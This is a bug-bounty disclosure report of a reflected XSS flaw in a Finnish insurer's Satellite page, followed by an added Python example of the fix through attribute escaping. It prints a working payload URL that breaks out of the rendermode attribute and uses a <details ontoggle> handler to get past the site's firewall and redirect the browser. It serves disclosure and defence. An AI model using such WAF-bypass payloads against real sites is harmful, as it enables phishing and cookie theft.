LocalTapiola: Reflected XSS Vulnerability in https://www.lahitapiola.fi/cs/Satellite

ID H1:301680
Type hackerone
Reporter teemuk
Modified 2018-04-11T06:34:46


Basic report information

Summary: Reflected XSS vulnerability in https://www.lahitapiola.fi/cs/Satellite.

Description: There exists a reflected XSS vulnerability in https://www.lahitapiola.fi/cs/Satellite?pagename=TAMaster/FW_BlogAsset/FW_Nav. The value of the query string parameter rendermode is not properly escaped when it is output to the page. The web application firewall (WAF) seems to mitigate the majority of the simplest XSS vectors, but it is possible to bypass the WAF by using the ontoggle event on a <details> HTML element. The JavaScript used to demonstrate the vulnerability is location.href="https://www.google.com/?q="+document.domain. This demonstrates an open-redirect type of impact, where the user's browser is redirected to an attacker-controlled page on which the attacker can e.g. perform phishing.

Domain: www.lahitapiola.fi

Browsers / Apps Verified In:

  • Firefox version 57.0.3

Steps To Reproduce:

  1. Access the attack URL https://www.lahitapiola.fi/cs/Satellite?pagename=TAMaster/FW_BlogAsset/FW_Nav&rendermode=preview"><details%20open=true%20ontoggle=%27location.href="https://www.google.com/?q="%2Bdocument.domain%27><summary>testing</summary></details>
  2. The browser is redirected to https://www.google.com/?q=www.lahitapiola.fi.
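To show why the WAF bypass works and what actually closes the issue, here is an added Python example (not code from the report or from the site): a hypothetical template that echoes rendermode into an HTML attribute, rendered once unescaped and once with attribute encoding, plus a parser check that counts injected elements and event-handler attributes. The payload is constructed after the one in the description; the template and function names are assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed payload modelled on the report's rendermode value: it closes the
# attribute and the tag, then injects a <details> element whose ontoggle
# handler fires as soon as the open element is parsed.
PAYLOAD = ('preview"><details open=true ontoggle=\'location.href='
           '"https://www.google.com/?q="+document.domain\'>'
           '<summary>testing</summary></details>')


def render_unescaped(rendermode: str) -> str:
    """Vulnerable (hypothetical template): parameter concatenated into the attribute."""
    return '<input type="hidden" name="rendermode" value="' + rendermode + '">'


def render_escaped(rendermode: str) -> str:
    """Fixed: HTML-attribute encoding turns ", <, > and ' into inert entities."""
    safe = html.escape(rendermode, quote=True)
    return '<input type="hidden" name="rendermode" value="' + safe + '">'


class TagCollector(HTMLParser):
    """Records every start tag and every on* (event handler) attribute seen."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def injected_elements(fragment: str):
    """Return (tags other than the expected <input>, event-handler attributes)."""
    parser = TagCollector()
    parser.feed(fragment)
    parser.close()
    return [t for t in parser.tags if t != "input"], parser.handlers


if __name__ == "__main__":
    # Unescaped: the parser sees <details> and an ontoggle handler; the
    # escaped output contains only the single expected <input>.
    print(injected_elements(render_unescaped(PAYLOAD)))
    print(injected_elements(render_escaped(PAYLOAD)))
```

Because the fix works at the output-encoding layer, it neutralises the payload regardless of which event handler or tag name the WAF's blocklist happens to miss.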

Additional material

  • N/A

Related reports, best practices

This vulnerability is related to the previously reported Oracle WebCenter Sites vulnerabilities (e.g. #170532).


An attacker can use reflected XSS vulnerabilities to inject content into pages served from www.lahitapiola.fi. This can be used e.g. for phishing purposes or to steal cookies from the user's browser.